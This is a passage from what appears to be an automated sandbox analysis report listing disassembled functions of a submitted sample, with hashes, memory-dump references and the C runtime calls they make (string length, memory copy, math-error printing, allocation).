                • Instruction ID: 36c2d4d947826b7465fedf999df47deeeff2085806a691b3cb51f366d8c036a0
                • Opcode Fuzzy Hash: 0927fc067ebb6a33a96917f8bfe3f6ce7f7df60c436a53950f08f1643c458f46
                • Instruction Fuzzy Hash: 8051D652E0968686FB30AB36990436AA360FB55798F988371DB9D47791FF3DF081C710
                APIs
                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A062108
                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A0621A3
                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A06223A
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE66E3), ref: 00007FF72A0622D0
                  • Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: wcslen$memcpystrlen
                • String ID:
                • API String ID: 3111578849-0
                • Opcode ID: 8466c03248fce341d6f402fef4940c8792933acd647fd675550dae08b1f2027a
                • Instruction ID: 92b54f9d4129541623b1505924817831a36a62b38b0b5c5ac32e2f6233b2fbf5
                • Opcode Fuzzy Hash: 8466c03248fce341d6f402fef4940c8792933acd647fd675550dae08b1f2027a
                • Instruction Fuzzy Hash: 1BE14E62B09A0681EB70EB19E84026DE361FB89FD4F904676EE6D47794EF3CD541CB20
                APIs
                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A061938
                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A0619D3
                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A061A6A
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,?,00000000,?,?,00007FF729FE53D3), ref: 00007FF72A061B00
                  • Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: wcslen$memcpystrlen
                • String ID:
                • API String ID: 3111578849-0
                • Opcode ID: 40fa9441f0a5e6aa4ba5114cb36ad53663e56333714fd54fd52ad1764e1b87f5
                • Instruction ID: c41f90f8fdbf30a713d3c6917c0b7b28af554b6e36c0f0208f6c9812065dc9e3
                • Opcode Fuzzy Hash: 40fa9441f0a5e6aa4ba5114cb36ad53663e56333714fd54fd52ad1764e1b87f5
                • Instruction Fuzzy Hash: 27E15E62B08A0781EB60EF19E84026DA371FB85FE8B904676EE5D47794EF3CD545CB20
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func
                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 711238415-3474627141
                • Opcode ID: 07b72be768c9fcacdeb0d98bda45982e8566b82515d163f0a7091b43d3986cf5
                • Instruction ID: 8eb65a5a6346f3d11731344b253acd3344e838f28c0eedfc9bb60340fcd9e167
                • Opcode Fuzzy Hash: 07b72be768c9fcacdeb0d98bda45982e8566b82515d163f0a7091b43d3986cf5
                • Instruction Fuzzy Hash: 4C213826A04F849AE7119F68D8413EAB775FB59798F844622EE8C17724EF38D259C700
                APIs
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060A18
                  • Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060A9F
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060B21
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060BA3
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen$memcpy
                • String ID:
                • API String ID: 3396830738-0
                • Opcode ID: ec0177ab2c3040dcfadabe45140983ed302ed83747fde42a82098cf6649354b6
                • Instruction ID: 9988594e80389d131f821bc893b842c3b87c1236e530a8ba73f3016ffcbd5cdb
                • Opcode Fuzzy Hash: ec0177ab2c3040dcfadabe45140983ed302ed83747fde42a82098cf6649354b6
                • Instruction Fuzzy Hash: B9D1B162708B0781EB60EF1AE84056DA371FB85FD8B948676DE5E47795EE3CE140CB20
                APIs
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A0611A8
                  • Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A06122F
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A0612B1
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A061333
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen$memcpy
                • String ID:
                • API String ID: 3396830738-0
                • Opcode ID: 386ca3e97bc97830876448f36d3f02c93e1fa50d53d2af7be61a808401e4b891
                • Instruction ID: 975f5fe8d1c4ed6f75f128508554edd8ad9c9b31853523c68d46a00788f2260c
                • Opcode Fuzzy Hash: 386ca3e97bc97830876448f36d3f02c93e1fa50d53d2af7be61a808401e4b891
                • Instruction Fuzzy Hash: ECD1D162B08B0381EB60EF1AE84026DA371FB85FD4B844536EE5E47795EE3CD544CB20
                APIs
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF
                  • Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func__stdio_common_vfprintf
                • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 2168557111-2713391170
                • Opcode ID: 68f9f64199a9c06ca52ecc87fa6df189c933ab3708449a808d520ec22cc466d6
                • Instruction ID: cefcf03638ca037b4a5146165802ab156d0c49ac59a20861f4365f191890f18c
                • Opcode Fuzzy Hash: 68f9f64199a9c06ca52ecc87fa6df189c933ab3708449a808d520ec22cc466d6
                • Instruction Fuzzy Hash: 0F017C27A04F888AE7119F69D8402AAB770FF4D798F444762EF8D27728DF28C244C710
                APIs
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF
                  • Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func__stdio_common_vfprintf
                • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 2168557111-4064033741
                • Opcode ID: 0847bcc77b85e37276453c8a292708eb9d10d550879459940c25855d04d36c4d
                • Instruction ID: 463c816e94f6b4361f8053e62cffa1f8543c9704066ea1279a2b5b745e91588b
                • Opcode Fuzzy Hash: 0847bcc77b85e37276453c8a292708eb9d10d550879459940c25855d04d36c4d
                • Instruction Fuzzy Hash: DC017C27A04F888AE7119F69D8402AAB770FF4D798F444762EF8D27728DF28C244C710
                APIs
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF
                  • Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func__stdio_common_vfprintf
                • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 2168557111-2468659920
                • Opcode ID: 1740f074df9d0d3d0e48809e41b4479b67cd767e6609c8189211d6f6ae1918b8
                • Instruction ID: c310ac593b0ef9241783ab78b1ce42f737067bfb3950bcf4f79edb003ae1b99f
                • Opcode Fuzzy Hash: 1740f074df9d0d3d0e48809e41b4479b67cd767e6609c8189211d6f6ae1918b8
                • Instruction Fuzzy Hash: DF015A27A04F888AE7119F69D8402AAB770FB4D798F444762EF8D27724DF28C2448710
                APIs
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF
                  • Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func__stdio_common_vfprintf
                • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 2168557111-4283191376
                • Opcode ID: d9291ac94731095ccd7fd4078ca5c5070364b4ce9a3dd10b6f3e46fabbf30855
                • Instruction ID: 8913926a25857eaee324e52fc1b82a1d00da268dfd0b334edcfb07789c01f25d
                • Opcode Fuzzy Hash: d9291ac94731095ccd7fd4078ca5c5070364b4ce9a3dd10b6f3e46fabbf30855
                • Instruction Fuzzy Hash: EA017C27A04F888AE7119F69D8402AAB770FF4D798F444762EF8D27768DF28C245C710
                APIs
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF
                  • Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func__stdio_common_vfprintf
                • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 2168557111-4273532761
                • Opcode ID: 5574e596bd3942e983f6ee61704480de15341cfff0dde46b47e35dfb0dac427e
                • Instruction ID: 5ab3037744e29d9e8ef3ef1c76a12dc7faf3fe3e98b6cbe08954bb3eeca57d8a
                • Opcode Fuzzy Hash: 5574e596bd3942e983f6ee61704480de15341cfff0dde46b47e35dfb0dac427e
                • Instruction Fuzzy Hash: EF017C27A04F888AE7119F69D8402AAB770FF4DB98F444762EF8D27764DF28C244C710
                APIs
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF
                  • Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func__stdio_common_vfprintf
                • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 2168557111-2187435201
                • Opcode ID: c2574aeb36ef17c9a0e6d4006631dfbb6740d3c79e5ea7aabe9d69f3db815317
                • Instruction ID: c8dab285ec2b25bb4407f7dcac65d0f11b19881a2dcb9568614544b29fba34c6
                • Opcode Fuzzy Hash: c2574aeb36ef17c9a0e6d4006631dfbb6740d3c79e5ea7aabe9d69f3db815317
                • Instruction Fuzzy Hash: B0015A27A04F888AE7119F69D8402AAB770FB4D798F444722EF8D27724DF28C2448710
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strerrorstrlen
                • String ID: basic_string: construction from null is not valid
                • API String ID: 960536887-2991274800
                • Opcode ID: eeea25a2197ebb507ed858424a0c9ac4f65a91984dfbfd7ea8fa2b2e367fcf22
                • Instruction ID: b9d3832545fd2f6ffbe6cdfe40a7d0f84580b8da1ad28584f7d270934e2930c0
                • Opcode Fuzzy Hash: eeea25a2197ebb507ed858424a0c9ac4f65a91984dfbfd7ea8fa2b2e367fcf22
                • Instruction Fuzzy Hash: 91E0ED11F5AA2241FB1A7F16AC100F99260DF8AB90EC81031DC0C1B382EC2CEA478B20
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: calloc
                • String ID:
                • API String ID: 2635317215-0
                • Opcode ID: b27d27018714eb4883b57ef67b618f4a757feb0d8eeedd0dea2792b69c175127
                • Instruction ID: 13da40f1ea6fe1a4e5082f0fcdd8687e99c11ac35fe574ee42360a94f18ca079
                • Opcode Fuzzy Hash: b27d27018714eb4883b57ef67b618f4a757feb0d8eeedd0dea2792b69c175127
                • Instruction Fuzzy Hash: 46410326F047059AFB44AFAAD8443AD77B0EB44B48F848075CE1C1BB99DE38DB809B50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: free$memset
                • String ID:
                • API String ID: 2717317152-0
                • Opcode ID: dd240a26b788bc499e51edf1dbd0794f8fac90e42337e1d5944e3c7c1cdaba7f
